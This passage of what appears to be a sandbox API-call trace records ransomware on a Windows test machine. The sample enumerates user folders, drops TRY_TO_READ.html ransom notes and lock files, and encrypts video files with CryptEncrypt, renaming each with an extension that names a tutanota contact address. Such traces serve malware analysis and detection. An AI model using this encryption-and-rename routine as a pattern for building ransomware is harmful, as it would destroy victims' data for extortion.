dwSize=0x0, dwFreeType=0x8000) returned 1 [0121.532] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x50) returned 0x45b638 [0121.532] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\*", lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x328d2b90, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x328d2b90, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x328d2b90, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0xffffffff [0121.532] CloseHandle (hObject=0x3cc) returned 1 [0121.532] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0121.532] GetSystemTime (in: lpSystemTime=0x2a0400 | out: lpSystemTime=0x2a0400*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x3, wDay=0x4, wHour=0x11, wMinute=0x7, wSecond=0x0, wMilliseconds=0x391)) [0121.532] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2b0000 [0121.532] GetWindowsDirectoryW (in: lpBuffer=0x2b0000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0121.533] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2b0200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2b0600, lpMaximumComponentLength=0x2b0608, lpFileSystemFlags=0x2b0604, lpFileSystemNameBuffer=0x2b0400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2b0600*=0x9c354b42, lpMaximumComponentLength=0x2b0608*=0xff, lpFileSystemFlags=0x2b0604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0121.533] wsprintfW (in: param_1=0x2a0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu9c354ca09c354b444c.lock") returned 64 [0121.533] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu9c354ca09c354b444c.lock" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\start menu9c354ca09c354b444c.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3cc [0121.533] VirtualFree (lpAddress=0x2b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0121.533] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0121.533] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x60) returned 0x4b19b0 [0121.533] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\*", lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x328d2b90, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x328d2b90, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x328d2b90, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0xffffffff [0121.534] CloseHandle (hObject=0x3cc) returned 1 [0121.534] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0121.534] GetSystemTime (in: lpSystemTime=0x2a0400 | out: lpSystemTime=0x2a0400*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x3, wDay=0x4, wHour=0x11, wMinute=0x7, wSecond=0x0, wMilliseconds=0x391)) [0121.534] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2b0000 [0121.534] GetWindowsDirectoryW (in: lpBuffer=0x2b0000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0121.534] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2b0200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2b0600, lpMaximumComponentLength=0x2b0608, lpFileSystemFlags=0x2b0604, lpFileSystemNameBuffer=0x2b0400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2b0600*=0x9c354b42, lpMaximumComponentLength=0x2b0608*=0xff, lpFileSystemFlags=0x2b0604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0121.534] wsprintfW (in: param_1=0x2a0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Templates9c354ca09c354b444c.lock") returned 63 [0121.534] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Templates9c354ca09c354b444c.lock" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\templates9c354ca09c354b444c.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3cc [0121.535] VirtualFree (lpAddress=0x2b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0121.535] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0121.535] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x60) returned 0x4b1a18 [0121.535] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\*", lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x328d2b90, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x328d2b90, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x328d2b90, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0xffffffff [0121.535] CloseHandle (hObject=0x3cc) returned 1 [0121.535] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0121.535] GetSystemTime (in: lpSystemTime=0x2a0400 | out: lpSystemTime=0x2a0400*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x3, wDay=0x4, wHour=0x11, wMinute=0x7, wSecond=0x0, wMilliseconds=0x391)) [0121.535] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2b0000 [0121.536] GetWindowsDirectoryW (in: lpBuffer=0x2b0000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0121.536] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2b0200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2b0600, lpMaximumComponentLength=0x2b0608, lpFileSystemFlags=0x2b0604, lpFileSystemNameBuffer=0x2b0400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2b0600*=0x9c354b42, lpMaximumComponentLength=0x2b0608*=0xff, lpFileSystemFlags=0x2b0604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0121.536] wsprintfW (in: param_1=0x2a0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos9c354ca09c354b444c.lock") returned 60 [0121.536] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos9c354ca09c354b444c.lock" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos9c354ca09c354b444c.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3cc [0121.536] VirtualFree (lpAddress=0x2b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0121.536] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0121.537] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x50) returned 0x45b638 [0121.537] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*", lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x328f8cf0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x328f8cf0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x48eff0 [0121.537] FindNextFileW (in: hFindFile=0x48eff0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x328f8cf0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x328f8cf0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0121.537] FindNextFileW (in: hFindFile=0x48eff0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9868fcc0, ftCreationTime.dwHighDateTime=0x1d5e5bb, ftLastAccessTime.dwLowDateTime=0x984d00b0, ftLastAccessTime.dwHighDateTime=0x1d5df62, ftLastWriteTime.dwLowDateTime=0x984d00b0, ftLastWriteTime.dwHighDateTime=0x1d5df62, nFileSizeHigh=0x0, nFileSizeLow=0x18cee, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0DQfbzTo9J97Z r3dmC.mkv", cAlternateFileName="0DQFBZ~1.MKV")) returned 1 [0121.537] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0DQfbzTo9J97Z r3dmC.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\0dqfbzto9j97z r3dmc.mkv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4c8 [0121.537] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0121.537] LockFile (hFile=0x4c8, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x18cee, nNumberOfBytesToLockHigh=0x0) returned 1 [0121.537] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0121.537] ReadFile (in: hFile=0x4c8, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0121.538] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.538] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0121.538] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0121.538] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0121.538] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0DQfbzTo9J97Z r3dmC.mkv", dwFileAttributes=0x80) returned 1 [0121.539] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0DQfbzTo9J97Z r3dmC.mkv") returned 61 [0121.539] GetProcessHeap () returned 0x410000 [0121.539] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xea) returned 0x44faf8 [0121.539] lstrcpyW (in: lpString1=0x44faf8, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0DQfbzTo9J97Z r3dmC.mkv" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0DQfbzTo9J97Z r3dmC.mkv") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0DQfbzTo9J97Z r3dmC.mkv" [0121.539] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0DQfbzTo9J97Z r3dmC.mkv", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0DQfbzTo9J97Z r3dmC.mkv.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0DQfbzTo9J97Z r3dmC.mkv.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0121.539] GetFileSizeEx (in: hFile=0x4c8, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=101614) returned 1 [0121.539] SetFilePointer (in: hFile=0x4c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x18cee [0121.539] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0121.539] GetProcessHeap () returned 0x410000 [0121.539] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0121.539] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0121.539] WriteFile (in: hFile=0x4c8, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0121.541] WriteFile (in: hFile=0x4c8, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0121.542] WriteFile (in: hFile=0x4c8, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0121.543] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x18cee) returned 0xf50048 [0121.544] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x18cee) returned 0xf68d40 [0121.544] SetFilePointer (in: hFile=0x4c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.544] ReadFile (in: hFile=0x4c8, lpBuffer=0xf50048, nNumberOfBytesToRead=0x18cee, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0xf50048*, lpNumberOfBytesRead=0x367f44c*=0x18cee, lpOverlapped=0x0) returned 1 [0121.549] UnlockFile (hFile=0x4c8, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x18cee, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0121.549] CloseHandle (hObject=0x4c8) returned 1 [0121.549] GetProcessHeap () returned 0x410000 [0121.549] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0121.549] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0DQfbzTo9J97Z r3dmC.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\0dqfbzto9j97z r3dmc.mkv"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0DQfbzTo9J97Z r3dmC.mkv.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\0dqfbzto9j97z r3dmc.mkv.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0121.552] GetProcessHeap () returned 0x410000 [0121.552] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44faf8 | out: hHeap=0x410000) returned 1 [0121.552] FindNextFileW (in: hFindFile=0x48eff0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5abb2460, ftCreationTime.dwHighDateTime=0x1d5e733, ftLastAccessTime.dwLowDateTime=0xa080d870, ftLastAccessTime.dwHighDateTime=0x1d5e731, ftLastWriteTime.dwLowDateTime=0xa080d870, ftLastWriteTime.dwHighDateTime=0x1d5e731, nFileSizeHigh=0x0, nFileSizeLow=0x599a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0XqTVi45SMew.mp4", cAlternateFileName="0XQTVI~1.MP4")) returned 1 [0121.552] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0XqTVi45SMew.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\0xqtvi45smew.mp4"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4c8 [0121.552] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0121.552] LockFile (hFile=0x4c8, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x599a, nNumberOfBytesToLockHigh=0x0) returned 1 [0121.552] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0121.553] ReadFile (in: hFile=0x4c8, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0121.553] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.553] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0121.553] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0121.554] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0121.554] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0XqTVi45SMew.mp4", dwFileAttributes=0x80) returned 1 [0121.554] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0XqTVi45SMew.mp4") returned 54 [0121.554] GetProcessHeap () returned 0x410000 [0121.554] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xdc) returned 0x44faf8 [0121.554] lstrcpyW (in: lpString1=0x44faf8, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0XqTVi45SMew.mp4" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0XqTVi45SMew.mp4") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0XqTVi45SMew.mp4" [0121.554] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0XqTVi45SMew.mp4", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0XqTVi45SMew.mp4.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0XqTVi45SMew.mp4.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0121.554] GetFileSizeEx (in: hFile=0x4c8, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=22938) returned 1 [0121.554] SetFilePointer (in: hFile=0x4c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x599a [0121.554] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0121.554] GetProcessHeap () returned 0x410000 [0121.554] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0121.554] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0121.556] WriteFile (in: hFile=0x4c8, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0121.557] WriteFile (in: hFile=0x4c8, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0121.558] WriteFile (in: hFile=0x4c8, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0121.559] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x599a) returned 0x4dcb68 [0121.559] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x599a) returned 0x4e2510 [0121.559] SetFilePointer (in: hFile=0x4c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.559] ReadFile (in: hFile=0x4c8, lpBuffer=0x4dcb68, nNumberOfBytesToRead=0x599a, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4dcb68*, lpNumberOfBytesRead=0x367f44c*=0x599a, lpOverlapped=0x0) returned 1 [0121.561] UnlockFile (hFile=0x4c8, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x599a, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0121.561] CloseHandle (hObject=0x4c8) returned 1 [0121.562] GetProcessHeap () returned 0x410000 [0121.562] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0121.562] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0XqTVi45SMew.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\0xqtvi45smew.mp4"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0XqTVi45SMew.mp4.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\0xqtvi45smew.mp4.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0121.564] GetProcessHeap () returned 0x410000 [0121.564] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44faf8 | out: hHeap=0x410000) returned 1 [0121.564] FindNextFileW (in: hFindFile=0x48eff0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x23a13460, ftCreationTime.dwHighDateTime=0x1d5e19d, ftLastAccessTime.dwLowDateTime=0xd8613d60, ftLastAccessTime.dwHighDateTime=0x1d5e35e, ftLastWriteTime.dwLowDateTime=0xd8613d60, ftLastWriteTime.dwHighDateTime=0x1d5e35e, nFileSizeHigh=0x0, nFileSizeLow=0xbba8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="16vBBvZfKc2.avi", cAlternateFileName="16VBBV~1.AVI")) returned 1 [0121.564] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\16vBBvZfKc2.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\16vbbvzfkc2.avi"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4c8 [0121.564] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0121.564] LockFile (hFile=0x4c8, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0xbba8, nNumberOfBytesToLockHigh=0x0) returned 1 [0121.564] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0121.564] ReadFile (in: hFile=0x4c8, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0121.565] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.565] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0121.565] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0121.565] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0121.565] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\16vBBvZfKc2.avi", dwFileAttributes=0x80) returned 1 [0121.565] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\16vBBvZfKc2.avi") returned 53 [0121.565] GetProcessHeap () returned 0x410000 [0121.565] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xda) returned 0x44faf8 [0121.566] lstrcpyW (in: lpString1=0x44faf8, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\16vBBvZfKc2.avi" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\16vBBvZfKc2.avi") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\16vBBvZfKc2.avi" [0121.566] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\16vBBvZfKc2.avi", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\16vBBvZfKc2.avi.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS 